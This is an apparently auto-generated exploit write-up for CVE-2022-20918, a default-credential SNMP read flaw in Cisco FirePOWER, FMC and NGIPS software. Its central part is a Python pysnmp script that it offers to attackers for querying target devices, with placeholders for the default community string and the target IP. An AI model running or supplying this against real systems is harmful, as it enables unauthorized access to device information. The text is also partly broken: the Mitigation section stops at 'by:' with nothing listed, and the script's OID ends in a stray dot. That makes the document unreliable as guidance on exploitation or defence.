CVE-2022-20918 - Unauthenticated SNMP Access Exploit in Cisco FirePOWER and NGIPS Software

A critical security vulnerability (CVE-2022-20918) has been discovered that impacts Cisco's FirePOWER Software for Adaptive Security Appliance (ASA) FirePOWER module, Cisco Firepower Management Center (FMC) Software, and Cisco Next-Generation Intrusion Prevention System (NGIPS) Software. This vulnerability allows an unauthenticated, remote attacker to perform an SNMP GET request using a default credential, potentially leading to unauthorized retrieval of sensitive information from an affected device.

Exploit Details

The vulnerability is due to the presence of a default credential for SNMP version 1 (SNMPv1) and SNMP version 2 (SNMPv2) in the affected software. An attacker could exploit this vulnerability by sending an SNMPv1 or SNMPv2 GET request to an affected device. A successful exploit could allow the attacker to retrieve sensitive information from the device using the default credential. However, this attack will only be successful if SNMP is configured on the affected device, and the attacker can only perform SNMP GET requests; write access using SNMP is not allowed.

Code Snippet

In Python, an attacker can send an SNMP GET request with the following code to exploit the vulnerability:

from pysnmp.hlapi import *

community_data = "default_community_string"
target_ip = "target_device_ip"
OID_sysDescr = "1.3.6.1.2.1.1.1."

def get_snmp_data(community, oid, ip):
    errorIndication, errorStatus, errorIndex, varBinds = next(
        getCmd(SnmpEngine(),
               CommunityData(community, mpModel=1),
               UdpTransportTarget((ip, 161)),
               ContextData(),
               ObjectType(ObjectIdentity(oid)))
    )

    if errorIndication:
        print(errorIndication)
    elif errorStatus:
        print("Error: %s at index %s" % (errorStatus.prettyPrint(), errorIndex))
    else:
        for varBind in varBinds:
            print("SNMP Data: %s = %s" % varBind)

get_snmp_data(community_data, OID_sysDescr, target_ip)

Note: Replace "default_community_string" and "target_device_ip" in the code with the actual default community string and the IP address of the target device.

Original References

1. Cisco Advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snmp-MPbZ5W8M
2. CVE Details: https://nvd.nist.gov/vuln/detail/CVE-2022-20918

Mitigation

Cisco has released software updates to address this vulnerability in affected products. It is highly recommended that users apply these updates as soon as possible. Additionally, organizations can reduce the risk of exploitation by:

Conclusion

CVE-2022-20918 is a critical vulnerability affecting Cisco FirePOWER and NGIPS Software, posing a risk to sensitive information on affected devices. While the successful exploitation of this issue requires specific conditions, it's important for users to apply patches and implement additional security measures. Stay informed about security updates and be vigilant in maintaining and monitoring network security.

Timeline

Published on: 11/15/2022 21:15:00 UTC
Last modified on: 11/22/2022 00:48:00 UTC